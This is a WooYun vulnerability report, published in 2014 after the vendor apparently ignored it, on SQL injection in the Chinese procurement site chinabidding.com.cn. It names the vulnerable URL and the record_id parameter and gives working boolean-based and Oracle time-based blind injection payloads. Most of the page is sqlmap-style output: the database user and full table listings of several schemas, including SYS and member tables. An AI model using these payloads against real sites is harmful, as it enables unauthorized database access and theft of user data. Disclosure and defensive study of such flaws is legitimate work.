当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044679

漏洞标题:敏感信息泄露#中国采购与招标网oracle注入漏洞

相关厂商:chinabidding.com.cn

漏洞作者: adm1n

提交时间:2013-12-02 13:21

修复时间:2014-01-16 13:22

公开时间:2014-01-16 13:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中国采购与招标网oracle注入漏洞

详细说明:

1.http://www.chinabidding.com.cn/zbw/zbxx/zbgg/sbiao_tj.jsp?
op=op_browse&record_id=9138207

漏洞证明:

Place: GET
Parameter: record_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: op=op_browse&record_id=9138207 AND 2969=2969
Type: AND/OR time-based blind
Title: Oracle OR time-based blind
Payload: op=op_browse&record_id=-2674 OR 7281=DBMS_PIPE.RECEIVE_MESSAGE(CHR(
118)||CHR(114)||CHR(110)||CHR(109),5)
---
[17:37:41] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
current user: 'INFOSERVICE'
Database: JOINSPIDER
[99 tables]
+--------------------------------+
| A |
| ACTIVEMQ_ACKS |
| ACTIVEMQ_LOCK |
| ACTIVEMQ_MSGS |
| ATTACHMENTS |
| ATTACHMENTS_TEST |
| CONFIG_OPTION |
| CRON_INFOS |
| EX_ZBXX_ONE |
| EX_ZBXX_TWO |
| FILED_INFOS |
| FJ_SHEET |
| IDMODEL |
| ITEM_INFOS |
| LX_PROVINCE_DATLY_AMOUNT |
| LX_SPIDER_DAILY_AMOUNT1 |
| L_PROVINCE_DATLY_AMOUNT |
| L_SITE_INFOS3 |
| L_SITE_REGION |
| L_SPIDER_EXEC_NULL |
| MANUAL_LOGS |
| NEWS_SHEET |
| NEWS_SHEET_BAK |
| PLAN_TABLE |
| POST_DATA_LOGS |
| POST_URLS |
| PROVINCE_DAILY_AMOUNT |
| PROXY_INFOS |
| PUBLISH_INFO_SHEET |
| PUBLISH_SHEET |
| QRTZ_BLOB_TRIGGERS |
| QRTZ_CALENDARS |
| QRTZ_CRON_TRIGGERS |
| QRTZ_FIRED_TRIGGERS |
| QRTZ_JOB_DETAILS |
| QRTZ_JOB_LISTENERS |
| QRTZ_LOCKS |
| QRTZ_PAUSED_TRIGGER_GRPS |
| QRTZ_SCHEDULER_STATE |
| QRTZ_SIMPLE_TRIGGERS |
| QRTZ_TRIGGERS |
| QRTZ_TRIGGER_LISTENERS |
| QYCG_SHEET |
| READ_MODELS |
| REGION_INFOS |
| REGION_INFOS2 |
| ROUGH_SYNC_TASKS |
| SERVER_INFOS |
| SERVICE_LOG |
| SHEET_INFOS |
| SHEET_SEARCHS |
| SITE_INFOS |
| SITE_INFOS1 |
| SITE_INFO_DETAIL |
| SITE_INFO_DETAIL1 |
| SITE_INFO_LOGS |
| SITE_INFO_SUM_90 |
| SITE_URLS |
| SITE_URL_TYPES |
| SPIDERCOUNT |
| SPIDERCOUNTBO0_3 |
| SPIDERCOUNTBO1_3 |
| SPIDERCOUNTBO2_3 |
| SPIDERPROVINCECOUNT |
| SPIDERSITECOUNT |
| SPIDER_DAILY_AMOUNT |
| SPIDER_EXEC_REMARK |
| SPIDER_LOGS |
| STAT_DOWN_SPEED |
| STAT_SERVER |
| SYS_EXPORT_SCHEMA_01 |
| TB_ATTACHMENT |
| TB_REGION |
| TB_SITE |
| TB_SPIDER_ALERM |
| TB_SPIDER_EXEC |
| TB_SPIDER_EXEC_REMARK |
| TB_SPIDER_INFO |
| TB_SPIDER_INFO_LOG |
| TB_SPIDER_LOG |
| USERS |
| V_SPIDER_ALERM |
| V_SPIDER_EXEC |
| V_SPIDER_EXEC_DETAIL |
| V_SPIDER_EXEC_NULL |
| V_SPIDER_EXEC_TMP |
| V_SPIDER_PROXY |
| V_SPIDER_ZBGG_COUNT |
| V_SPIDER_ZBGS_COUNT |
| V_SPIDER_ZFCG_COUNT |
| X |
| XXX_SHEET |
| ZBGG1_SHEET |
| ZBGG_SHEET |
| ZBGS1_SHEET |
| ZBGS_SHEET |
| ZBGS_TEST |
| ZBYG_SHEET |
| ZFCG_SHEET |
+--------------------------------+
Database: OUTLN
[3 tables]
+--------------------------------+
| OL$ |
| OL$HINTS |
| OL$NODES |
+--------------------------------+
Database: CBL_ZHANGHT
[46 tables]
+--------------------------------+
| MD_ADDITIONAL_PROPERTIES |
| MD_APPLICATIONFILES |
| MD_APPLICATIONS |
| MD_CATALOGS |
| MD_COLUMNS |
| MD_CONNECTIONS |
| MD_CONSTRAINTS |
| MD_CONSTRAINT_DETAILS |
| MD_DERIVATIVES |
| MD_FILE_ARTIFACTS |
| MD_GROUPS |
| MD_GROUP_MEMBERS |
| MD_GROUP_PRIVILEGES |
| MD_INDEXES |
| MD_INDEX_DETAILS |
| MD_MIGR_DEPENDENCY |
| MD_MIGR_PARAMETER |
| MD_MIGR_WEAKDEP |
| MD_NUMROW$SOURCE |
| MD_NUMROW$TARGET |
| MD_OTHER_OBJECTS |
| MD_PACKAGES |
| MD_PARTITIONS |
| MD_PRIVILEGES |
| MD_PROJECTS |
| MD_REGISTRY |
| MD_REPOVERSIONS |
| MD_SCHEMAS |
| MD_SEQUENCES |
| MD_STORED_PROGRAMS |
| MD_SYNONYMS |
| MD_TABLES |
| MD_TABLESPACES |
| MD_TRIGGERS |
| MD_USERS |
| MD_USER_DEFINED_DATA_TYPES |
| MD_USER_PRIVILEGES |
| MD_VIEWS |
| MIGRATION_RESERVED_WORDS |
| MIGRLOG |
| MIGR_DATATYPE_TRANSFORM_MAP |
| MIGR_DATATYPE_TRANSFORM_RULE |
| MIGR_GENERATION_ORDER |
| STAGE_MIGRLOG |
| T_MEMBER_INFO |
| T_MEMBER_INFO_20130108 |
+--------------------------------+
Database: INFOSERVICE
[195 tables]
+--------------------------------+
| ETOPIC |
| ! |
| \T |
| \X02 |
| \X02_ZTTEMPLATS_VIRTUAI |
| \X03 |
| \X04BCATVLD |
| \X04YSTEM_LOG_BAK |
| \X04_PUBLISH_RECYCLE |
| \X08_PUBLISH_INFO_FREE_SQ |
| \X10SERFROM |
| \X10_NEWS_BAK |
| \X11 |
| @YS_EXPORT_TABLE_03 |
| @_ALIBABA_PROVIDER |
| A |
| ATTACHMENT |
| BLOCKS_INFOS |
| CA |
| CN_BLOCKS |
| D1 |
| FILETOPIC |
| JBS_MENU |
| MICROSOFTDTPROPERTIES |
| MONITOR |
| MONITOR_201007 |
| PBCATCOL |
| PBCATFMT |
| PBCATTBL |
| PLAN_TABLE |
| POPEDOM_DETAIL |
| POPEDOM_GROUP |
| PUBT_CODE |
| SYSTEM_DEPART |
| SYSTEM_MENU |
| SYSTEM_PRO |
| SYS_EXPORT_SCHEMA_01 |
| SYS_EXPORT_SCHEMA_02 |
| SYS_EXPORT_SCHEMA_03 |
| SYS_EXPORT_TABLE_01 |
| SYS_EXPORT_TABLE_02 |
| SYS_EXPORT_TABLE_05 |
| SYS_EXPORT_TABLE_06 |
| SYS_EXPORT_TABLE_07 |
| SYS_EXPORT_TABLE_08 |
| SYS_EXPORT_TABLE_09 |
| SYS_EXPORT_TABLE_10 |
| SYS_EXPORT_TABLE_11 |
| SYS_EXPORT_TABLE_12 |
| SYS_EXPORT_TABLE_13 |
| SYS_EXPORT_TABLE_14 |
| SYS_EXPORT_TABLE_15 |
| SYS_EXPORT_TABLE_16 |
| SYS_EXPORT_TABLE_17 |
| SYS_EXPORT_TABLE_18 |
| SYS_EXPORT_TABLE_19 |
| SYS_EXPORT_TABLE_20 |
| SYS_EXPORT_TABLE_21 |
| TEMP_DATA |
| TENDER |
| TENDERS |
| T_AD_CLICK |
| T_AD_CLICK_BAK |
| T_AD_COLUMN |
| T_AD_INFO |
| T_AD_IP |
| T_ALIBABA_CLASS |
| T_AUTO_A |
| T_BBS_CONTENTS |
| T_BBS_KEYWORDS |
| T_BBS_NAME |
| T_BIDBLOG_INFO |
| T_BID_VOTE_2007 |
| T_BID_VOTE_2007_INFO |
| T_BID_VOTE_2007_LOG |
| T_BID_VOTE_2008 |
| T_BID_VOTE_2008_INFO |
| T_BID_VOTE_2008_LOG |
| T_BULLETIN |
| T_CHANNEL_INFO |
| T_CHOOSE |
| T_COLLECT_IDEA_NUM56 |
| T_COLLECT_IDEA_ROTTEN |
| T_COLLECT_KEYWORD |
| T_COLLECT_NOTE |
| T_CREDIT_ARCHIVE_BASIC |
| T_CREDIT_ARCHIVE_LIST |
| T_CURATIVE_BID_TEMP |
| T_CURATIVE_CATALOG |
| T_CURATIVE_FAIR_TEMP |
| T_DELINFONUM_BACKUP |
| T_DELINFO_HITS |
| T_DOWNLOAD_A |
| T_ELEC_PRESS_COMMENT |
| T_ELEC_PRESS_RESEARCH |
| T_ELEC_PRESS_SORT |
| T_ESEP_INFO |
| T_ESEP_INFO2 |
| T_ESEP_INFO4 |
| T_FAIR_NEWS |
| T_FEEDBACK_INFO |
| T_HIT_A |
| T_INFO_LASTMODFY |
| T_INFO_LOG |
| T_INFO_LOG_FREE_BAK |
| T_INFO_SYNC_MESSAGE |
| T_INFO_SYNC_MESSAGE_TEST |
| T_KFZX_INFO |
| T_KFZX_VIP_YJZJ |
| T_KFZX_YJZJ |
| T_LIVE_MAIN |
| T_LOG_CATCH |
| T_MEMBER_DEL |
| T_MEMBER_EFFECT |
| T_MEMBER_IM |
| T_MEMBER_INFO |
| T_MEMBER_INFO2 |
| T_MEMBER_INFO2_SUM |
| T_MEMBER_INFO_20120310 |
| T_MEMBER_INFO_COMPANY_NAME |
| T_MEMBER_INFO_COMPANY_NAME_R |
| T_MEMBER_INFO_LOG_BAK |
| T_MEMBER_INFO_MONITOR |
| T_MEMBER_INFO_SUM |
| T_MEMBER_LIMIT_IP |
| T_MEMBER_MAINPAGE |
| T_MEMBER_MY_INFO |
| T_MEMBER_WORKLOG |
| T_MEMBER_WORKLOG_BAK |
| T_NEWS |
| T_NEWSPARENT |
| T_NEWSPIC |
| T_PH_SENTMAIL |
| T_POP_ATTENTION |
| T_PRODUCT_DEL |
| T_PRODUCT_INFO |
| T_PROVIDER |
| T_PROVIDER2 |
| T_PUBLA |
| T_PUBLI |
| T_PUBLISH |
| T_PUBLISH_BXINFO |
| T_PUBLISH_CONTENT |
| T_PUBLISH_FGZX |
| T_PUBLISH_INFO |
| T_PUBLISH_INFO_2009A2 |
| T_PUBLISH_INFO_2009B |
| T_PUBLISH_INFO_2010B |
| T_PUBLISH_INFO_FREE |
| T_PUBLISH_INFO_GXZB |
| T_PUBLISH_INFO_OTHER |
| T_PUBLISH_INFO_TEMP |
| T_PUBLISH_INFO_TEMP_FGZX |
| T_PUBLISH_IT_TEMP |
| T_PUBLISH_JHTJ |
| T_PUBLISH_LOG_BAK |
| T_PUBLISH_MAINPAGE |
| T_PUBLISH_NEWS |
| T_PUBLISH_OLC |
| T_PUBLISH_OLD |
| T_PUBLISH_OLD_2003 |
| T_PUBLISH_OLD_2004A |
| T_PUBLISH_OLD_2006A |
| T_PUBLISH_OLD_2006B |
| T_PUBLISH_OLD_2012B |
| T_PUBLISH_REPEAT |
| T_PUBLISH_ZBDL |
| T_PUBLISH_ZBXX |
| T_PUBLISH_ZBXX_20100730 |
| T_PUBLISH_ZBXX_2011 |
| T_PUBLISH_ZBXX_TEMP |
| T_PUBLISH_ZBXX_TEMP2 |
| T_RIGHT |
| T_RIGHT_GROUP |
| T_SIGN_INFO |
| T_SOIL_EMAIL |
| T_SOIL_INFO |
| T_SOIL_INFO_TEMP |
| T_STATISTICS_INFO |
| T_STATISTICS_INFO_ZXZX |
| T_SUB_ELEC_PRESS |
| T_TEST |
| T_TEST_SPRING |
| T_TOPIC_REPOST |
| T_TRANS_DEL |
| T_TRANS_INFO |
| T_TRANS_MSG |
| T_USER_DOCUMENTARY_INFOLOG |
| T_USER_DOCUMENTARY_SEARCHLOG |
| T_ZTB_YJZJ |
| T_ZTTEMPLATS_COLUMN |
| T_ZTTEMPLATS_INFO |
| T_ZXZX_TEMP |
| USER_REGIST_LS |
| ZBGXBIAODUAN |
+--------------------------------+
Database: SYSTEM
[41 tables]
+--------------------------------+
| EPCAT$_TEMPLATE_SIQ |
| OGMNR_ATTRCOL$ |
| OGMNR_ATTRIBUTE$ |
| ! |
| \T |
| \X02 |
| \X02OGMNR_AGE_SPILL$ |
| \X02OGMNR_HEADER2$ |
| \X02OGSTDBY$SKIP_TRANSACTION |
| \X02VIEW$_ADV_PRETTY |
| \X03 |
| \X04EF$_PUSHED_TRANSACTIONS |
| \X04EPCAT$_RESOLUTION_METHOA |
| \X04OGMNR_ERROR$ |
| \X05 |
| \X08EPCAT$_FLAVOR_OBJECTS |
| \X08EPCAT$_KEY_COLUMNS |
| \X10VIEW$_ADV_INFO |
| \X11 |
| @OGSTDBY$EVENTS |
| @VIEW$_ADV_CLIQUE |
| A |
| LI |
| LOE |
| LOG |
| LOGM |
| LOGMNR_DICTIONA |
| LOGMNR_DICTSTATE$ |
| LOGMNR_FII |
| LOGMNR_I |
| LOGMNR_RE |
| LOGMNR_SPILL$ |
| LOGSTDBY$APPLY_A |
| MVIEW$_AC |
| MVIEW$_ADU |
| MVIEW$_ADVA |
| MVIEW$_ADV_JA |
| REPA |
| REPCAT |
| REPCAT$_FLAVORS |
| REPCAT$_REPSCHEMA |
+--------------------------------+
Database: SYS
[677 tables]
+--------------------------------+
| DUAL |
| ACCESS$ |
| ALERT_QT |
| APPLY$_CONF_HDLR_COLUMNS |
| APPLY$_CONSTRAINT_COLUMNS |
| APPLY$_DEST_OBJ |
| APPLY$_DEST_OBJ_CMAP |
| APPLY$_DEST_OBJ_OPS |
| APPLY$_ERROR |
| APPLY$_ERROR_HANDLER |
| APPLY$_ERROR_TXN |
| APPLY$_SOURCE_OBJ |
| APPLY$_SOURCE_SCHEMA |
| APPLY$_VIRTUAL_OBJ_CONS |
| APPROLE$ |
| AQ$_ALERT_QT_G |
| AQ$_ALERT_QT_H |
| AQ$_ALERT_QT_I |
| AQ$_ALERT_QT_S |
| AQ$_ALERT_QT_T |
| AQ$_AQ$_MEM_MC_G |
| AQ$_AQ$_MEM_MC_H |
| AQ$_AQ$_MEM_MC_I |
| AQ$_AQ$_MEM_MC_S |
| AQ$_AQ$_MEM_MC_T |
| AQ$_KUPC$DATAPUMP_QUETAB_D |
| AQ$_KUPC$DATAPUMP_QUETAB_G |
| AQ$_KUPC$DATAPUMP_QUETAB_H |
| AQ$_KUPC$DATAPUMP_QUETAB_I |
| AQ$_KUPC$DATAPUMP_QUETAB_P |
| AQ$_KUPC$DATAPUMP_QUETAB_S |
| AQ$_KUPC$DATAPUMP_QUETAB_T |
| AQ$_MEM_MC |
| AQ$_MESSAGE_TYPES |
| AQ$_PENDING_MESSAGES |
| AQ$_PROPAGATION_STATUS |
| AQ$_PUBLISHER |
| AQ$_QUEUE_STATISTICS |
| AQ$_QUEUE_TABLE_AFFINITIES |
| AQ$_REPLAY_INFO |
| AQ$_SCHEDULER$_EVENT_QTAB_G |
| AQ$_SCHEDULER$_EVENT_QTAB_H |
| AQ$_SCHEDULER$_EVENT_QTAB_I |
| AQ$_SCHEDULER$_EVENT_QTAB_S |
| AQ$_SCHEDULER$_EVENT_QTAB_T |
| AQ$_SCHEDULER$_JOBQTAB_G |
| AQ$_SCHEDULER$_JOBQTAB_H |
| AQ$_SCHEDULER$_JOBQTAB_I |
| AQ$_SCHEDULER$_JOBQTAB_S |
| AQ$_SCHEDULER$_JOBQTAB_T |
| AQ$_SCHEDULES |
| AQ$_SYS$SERVICE_METRICS_TAB_G |
| AQ$_SYS$SERVICE_METRICS_TAB_H |
| AQ$_SYS$SERVICE_METRICS_TAB_I |
| AQ$_SYS$SERVICE_METRICS_TAB_S |
| AQ$_SYS$SERVICE_METRICS_TAB_T |
| AQ_EVENT_TABLE |
| AQ_SRVNTFN_TABLE |
| ARGUMENT$ |
| ASSOCIATION$ |
| ATEMPTAB$ |
| ATTRCOL$ |
| ATTRIBUTE$ |
| ATTRIBUTE_TRANSFORMATIONS$ |
| AUD$ |
| AUDIT$ |
| AUDIT_ACTIONS |
| AUX_STATS$ |
| AW$ |
| AW_OBJ$ |
| AW_PROP$ |
| BOOTSTRAP$ |
| CACHE_STATS_0$ |
| CACHE_STATS_1$ |
| CCOL$ |
| CDC_CHANGE_COLUMNS$ |
| CDC_CHANGE_SETS$ |
| CDC_CHANGE_SOURCES$ |
| CDC_CHANGE_TABLES$ |
| CDC_PROPAGATED_SETS$ |
| CDC_PROPAGATIONS$ |
| CDC_SUBSCRIBED_COLUMNS$ |
| CDC_SUBSCRIBED_TABLES$ |
| CDC_SUBSCRIBERS$ |
| CDC_SYSTEM$ |
| CDEF$ |
| CLU$ |
| CLUSTER_DATABASES |
| CLUSTER_INSTANCES |
| CLUSTER_NODES |
| COL$ |
| COLLECTION$ |
| COLTYPE$ |
| COL_USAGE$ |
| COM$ |
| CON$ |
| CONTEXT$ |
| DBMS_ALERT_INFO |
| DBMS_APPS_UPG_WORKING |
| DBMS_LOCK_ALLOCATED |
| DBMS_UPG_ACTION_QUEUE |
| DBMS_UPG_CAT_C0$ |
| DBMS_UPG_CAT_CS$ |
| DBMS_UPG_CAT_CT$ |
| DBMS_UPG_CHANGE$ |
| DBMS_UPG_CON_MAPPING |
| DBMS_UPG_DEBUG |
| DBMS_UPG_INVALIDATE |
| DBMS_UPG_LOG$ |
| DBMS_UPG_OBJAUTH_C0$ |
| DBMS_UPG_OBJAUTH_CS$ |
| DBMS_UPG_OBJAUTH_CT$ |
| DBMS_UPG_OBJECT$ |
| DBMS_UPG_RLS_C0$ |
| DBMS_UPG_RLS_CS$ |
| DBMS_UPG_RLS_CT$ |
| DBMS_UPG_STATUS$ |
| DBMS_UPG_SYSAUTH_C0$ |
| DBMS_UPG_SYSAUTH_CS$ |
| DBMS_UPG_SYSAUTH_CT$ |
| DEFROLE$ |
| DEFSUBPART$ |
| DEFSUBPARTLOB$ |
| DEPENDENCY$ |
| DIM$ |
| DIMATTR$ |
| DIMJOINKEY$ |
| DIMLEVEL$ |
| DIMLEVELKEY$ |
| DIR$ |
| DIR$ALERT_HISTORY |
| DIR$DATABASE_ATTRIBUTES |
| DIR$ESCALATE_OPERATIONS |
| DIR$INSTANCE_ACTIONS |
| DIR$MIGRATE_OPERATIONS |
| DIR$NODE_ATTRIBUTES |
| DIR$QUIESCE_OPERATIONS |
| DIR$REASON_STRINGS |
| DIR$RESONATE_OPERATIONS |
| DIR$SERVICE_ATTRIBUTES |
| DIR$SERVICE_OPERATIONS |
| DIR$VICTIM_POLICY |
| DUC$ |
| ENC$ |
| ERROR$ |
| EXPACT$ |
| EXPDEPACT$ |
| EXPDEPOBJ$ |
| EXPIMP_TTS_CT$ |
| EXPPKGACT$ |
| EXPPKGOBJ$ |
| EXTERNAL_LOCATION$ |
| EXTERNAL_TAB$ |
| FET$ |
| FGA$ |
| FGACOL$ |
| FGA_LOG$ |
| FGR$_FILE_GROUPS |
| FGR$_FILE_GROUP_EXPORT_INFO |
| FGR$_FILE_GROUP_FILES |
| FGR$_FILE_GROUP_VERSIONS |
| FGR$_TABLESPACE_INFO |
| FGR$_TABLE_INFO |
| FILE$ |
| FIXED_OBJ$ |
| HIER$ |
| HIERLEVEL$ |
| HISTGRM$ |
| HIST_HEAD$ |
| HS$_BASE_CAPS |
| HS$_BASE_DD |
| HS$_CLASS_CAPS |
| HS$_CLASS_DD |
| HS$_CLASS_INIT |
| HS$_FDS_CLASS |
| HS$_FDS_CLASS_DATE |
| HS$_FDS_INST |
| HS$_INST_CAPS |
| HS$_INST_DD |
| HS$_INST_INIT |
| ICOL$ |
| ICOLDEP$ |
| IDL_CHAR$ |
| IDL_SB4$ |
| IDL_UB1$ |
| IDL_UB2$ |
| ID_GENS$ |
| IMPDP_STATS |
| INCEXP |
| INCFIL |
| INCVID |
| IND$ |
| INDARRAYTYPE$ |
| INDCOMPART$ |
| INDOP$ |
| INDPART$ |
| INDPART_PARAM$ |
| INDSUBPART$ |
| INDTYPES$ |
| IND_ONLINE$ |
| IND_STATS$ |
| INVALIDATION_REGISTRY$ |
| JAVAOBJ$ |
| JAVASNM$ |
| JIJOIN$ |
| JIREFRESHSQL$ |
| JOB$ |
| KOPM$ |
| KU$NOEXP_TAB |
| KU$_LIST_FILTER_TEMP |
| KUPC$DATAPUMP_QUETAB |
| KU_NOEXP_TAB |
| LIBRARY$ |
| LINK$ |
| LOB$ |
| LOBCOMPPART$ |
| LOBFRAG$ |
| LOC$ |
| LOG$ |
| LOGMNRG_ATTRCOL$ |
| LOGMNRG_ATTRIBUTE$ |
| LOGMNRG_CCOL$ |
| LOGMNRG_CDEF$ |
| LOGMNRG_COL$ |
| LOGMNRG_COLTYPE$ |
| LOGMNRG_DICTIONARY$ |
| LOGMNRG_ICOL$ |
| LOGMNRG_IND$ |
| LOGMNRG_INDCOMPART$ |
| LOGMNRG_INDPART$ |
| LOGMNRG_INDSUBPART$ |
| LOGMNRG_LOB$ |
| LOGMNRG_LOBFRAG$ |
| LOGMNRG_OBJ$ |
| LOGMNRG_SEED$ |
| LOGMNRG_TAB$ |
| LOGMNRG_TABCOMPART$ |
| LOGMNRG_TABPART$ |
| LOGMNRG_TABSUBPART$ |
| LOGMNRG_TS$ |
| LOGMNRG_TYPE$ |
| LOGMNRG_USER$ |
| LOGMNRT_ATTRCOL$ |
| LOGMNRT_ATTRIBUTE$ |
| LOGMNRT_CCOL$ |
| LOGMNRT_CDEF$ |
| LOGMNRT_COL$ |
| LOGMNRT_COLTYPE$ |
| LOGMNRT_DICTIONARY$ |
| LOGMNRT_ICOL$ |
| LOGMNRT_IND$ |
| LOGMNRT_INDCOMPART$ |
| LOGMNRT_INDPART$ |
| LOGMNRT_INDSUBPART$ |
| LOGMNRT_LOB$ |
| LOGMNRT_LOBFRAG$ |
| LOGMNRT_OBJ$ |
| LOGMNRT_SEED$ |
| LOGMNRT_TAB$ |
| LOGMNRT_TABCOMPART$ |
| LOGMNRT_TABPART$ |
| LOGMNRT_TABSUBPART$ |
| LOGMNRT_TS$ |
| LOGMNRT_TYPE$ |
| LOGMNRT_USER$ |
| LOGMNR_BUILDLOG |
| LOGMNR_INTERESTING_COLS |
| MAP_COMPLIST$ |
| MAP_ELEMENT$ |
| MAP_EXTELEMENT$ |
| MAP_FILE$ |
| MAP_FILE_EXTENT$ |
| MAP_OBJECT |
| MAP_SUBELEMENT$ |
| METAFILTER$ |
| METANAMETRANS$ |
| METAPATHMAP$ |
| METASCRIPT$ |
| METASCRIPTFILTER$ |
| METASTYLESHEET |
| METAVIEW$ |
| METAXSL$ |
| METAXSLPARAM$ |
| METHOD$ |
| MIGRATE$ |
| MLOG$ |
| MLOG_REFCOL$ |
| MON_MODS$ |
| MON_MODS_ALL$ |
| NCOMP_DLL$ |
| NOEXP$ |
| NTAB$ |
| OBJ$ |
| OBJAUTH$ |
| OBJECT_USAGE |
| OBJPRIV$ |
| ODCI_SECOBJ$ |
| ODCI_WARNINGS$ |
| OID$ |
| OPANCILLARY$ |
| OPARG$ |
| OPBINDING$ |
| OPERATOR$ |
| OPQTYPE$ |
| OPTSTAT_HIST_CONTROL$ |
| PARAMETER$ |
| PARTCOL$ |
| PARTLOB$ |
| PARTOBJ$ |
| PENDING_SESSIONS$ |
| PENDING_SUB_SESSIONS$ |
| PENDING_TRANS$ |
| PLAN_TABLE$ |
| PROCEDURE$ |
| PROCEDUREC$ |
| PROCEDUREINFO$ |
| PROCEDUREJAVA$ |
| PROCEDUREPLSQL$ |
| PROFILE$ |
| PROFNAME$ |
| PROPS$ |
| PROXY_DATA$ |
| PROXY_INFO$ |
| PROXY_ROLE_DATA$ |
| PROXY_ROLE_INFO$ |
| PS$ |
| PSTUBTBL |
| RECENT_RESOURCE_INCARNATIONS$ |
| RECO_SCRIPT$ |
| RECO_SCRIPT_BLOCK$ |
| RECO_SCRIPT_ERROR$ |
| RECO_SCRIPT_PARAMS$ |
| RECYCLEBIN$ |
| REC_TAB$ |
| REC_VAR$ |
| REDEF$ |
| REDEF_DEP_ERROR$ |
| REDEF_OBJECT$ |
| REFCON$ |
| REG$ |
| REGISTRY$ |
| REGISTRY$DATABASE |
| REGISTRY$HISTORY |
| REGISTRY$LOG |
| REGISTRY$SCHEMAS |
| REG_SNAP$ |
| RESOURCE_CONSUMER_GROUP$ |
| RESOURCE_COST$ |
| RESOURCE_GROUP_MAPPING$ |
| RESOURCE_MAP |
| RESOURCE_MAPPING_PRIORITY$ |
| RESOURCE_PLAN$ |
| RESOURCE_PLAN_DIRECTIVE$ |
| RESULT$ |
| RGCHILD$ |
| RGROUP$ |
| RLS$ |
| RLS_CTX$ |
| RLS_GRP$ |
| RLS_SC$ |
| RULE$ |
| RULESET$ |
| RULE_EC$ |
| RULE_MAP$ |
| RULE_SET$ |
| RULE_SET_EE$ |
| RULE_SET_FOB$ |
| RULE_SET_IEUAC$ |
| RULE_SET_IOT$ |
| RULE_SET_NL$ |
| RULE_SET_PR$ |
| RULE_SET_RDEP$ |
| RULE_SET_RE$ |
| RULE_SET_ROP$ |
| RULE_SET_ROR$ |
| RULE_SET_TE$ |
| RULE_SET_VE$ |
| SCHEDULER$_CHAIN |
| SCHEDULER$_CLASS |
| SCHEDULER$_EVENT_LOG |
| SCHEDULER$_EVENT_QTAB |
| SCHEDULER$_EVTQ_SUB |
| SCHEDULER$_GLOBAL_ATTRIBUTE |
| SCHEDULER$_JOB |
| SCHEDULER$_JOBQTAB |
| SCHEDULER$_JOB_ARGUMENT |
| SCHEDULER$_JOB_RUN_DETAILS |
| SCHEDULER$_OLDOIDS |
| SCHEDULER$_PROGRAM |
| SCHEDULER$_PROGRAM_ARGUMENT |
| SCHEDULER$_SCHEDULE |
| SCHEDULER$_SRCQ_INFO |
| SCHEDULER$_SRCQ_MAP |
| SCHEDULER$_STEP |
| SCHEDULER$_STEP_STATE |
| SCHEDULER$_WINDOW |
| SCHEDULER$_WINDOW_DETAILS |
| SCHEDULER$_WINDOW_GROUP |
| SCHEDULER$_WINGRP_MEMBER |
| SECOBJ$ |
| SEG$ |
| SEQ$ |
| SERVICE$ |
| SETTINGS$ |
| SLOG$ |
| SMON_SCN_TIME |
| SNAP$ |
| SNAP_COLMAP$ |
| SNAP_LOADERTIME$ |
| SNAP_LOGDEP$ |
| SNAP_OBJCOL$ |
| SNAP_REFOP$ |
| SNAP_REFTIME$ |
| SNAP_SITE$ |
| SOURCE$ |
| SQL$ |
| SQL$TEXT |
| SQLPROF$ |
| SQLPROF$ATTR |
| SQLPROF$DESC |
| SQL_VERSION$ |
| STATS_TARGET$ |
| STMT_AUDIT_OPTION_MAP |
| STREAMS$_APPLY_MILESTONE |
| STREAMS$_APPLY_PROCESS |
| STREAMS$_APPLY_PROGRESS |
| STREAMS$_APPLY_SPILL_MESSAGES |
| STREAMS$_APPLY_SPILL_MSGS_PART |
| STREAMS$_APPLY_SPILL_TXN |
| STREAMS$_APPLY_SPILL_TXN_LIST |
| STREAMS$_CAPTURE_PROCESS |
| STREAMS$_DEF_PROC |
| STREAMS$_DEST_OBJS |
| STREAMS$_DEST_OBJ_COLS |
| STREAMS$_EXTRA_ATTRS |
| STREAMS$_INTERNAL_TRANSFORM |
| STREAMS$_KEY_COLUMNS |
| STREAMS$_MESSAGE_CONSUMERS |
| STREAMS$_MESSAGE_RULES |
| STREAMS$_PREPARE_DDL |
| STREAMS$_PREPARE_OBJECT |
| STREAMS$_PRIVILEGED_USER |
| STREAMS$_PROCESS_PARAMS |
| STREAMS$_PROPAGATION_PROCESS |
| STREAMS$_RULES |
| SUBCOLTYPE$ |
| SUBPARTCOL$ |
| SUM$ |
| SUMAGG$ |
| SUMDELTA$ |
| SUMDEP$ |
| SUMDETAIL$ |
| SUMINLINE$ |
| SUMJOIN$ |
| SUMKEY$ |
| SUMPARTLOG$ |
| SUMPRED$ |
| SUMQB$ |
| SUPEROBJ$ |
| SYN$ |
| SYS$SERVICE_METRICS_TAB |
| SYSAUTH$ |
| SYSTEM_PRIVILEGE_MAP |
| SYS_IOT_OVER_11546 |
| SYS_IOT_OVER_4509 |
| SYS_IOT_OVER_4515 |
| SYS_IOT_OVER_4519 |
| SYS_IOT_OVER_5121 |
| SYS_IOT_OVER_5207 |
| SYS_IOT_OVER_7465 |
| SYS_IOT_OVER_8783 |
| SYS_IOT_OVER_8870 |
| SYS_IOT_OVER_9801 |
| SYS_IOT_OVER_9831 |
| TAB$ |
| TABCOMPART$ |
| TABLE_PRIVILEGE_MAP |
| TABPART$ |
| TABSUBPART$ |
| TAB_STATS$ |
| TRANSFORMATIONS$ |
| TRIGGER$ |
| TRIGGERCOL$ |
| TRIGGERJAVAC$ |
| TRIGGERJAVAF$ |
| TRIGGERJAVAM$ |
| TRIGGERJAVAS$ |
| TRUSTED_LIST$ |
| TS$ |
| TSM_DST$ |
| TSM_SRC$ |
| TSQ$ |
| TYPE$ |
| TYPED_VIEW$ |
| TYPEHIERARCHY$ |
| TYPE_MISC$ |
| UET$ |
| UGROUP$ |
| UNDO$ |
| USER$ |
| USER_ASTATUS_MAP |
| USER_HISTORY$ |
| USTATS$ |
| UTL_RECOMP_COMPILED |
| UTL_RECOMP_ERRORS |
| UTL_RECOMP_SORTED |
| VIEW$ |
| VIEWCON$ |
| VIEWTRCOL$ |
| VTABLE$ |
| WARNING_SETTINGS$ |
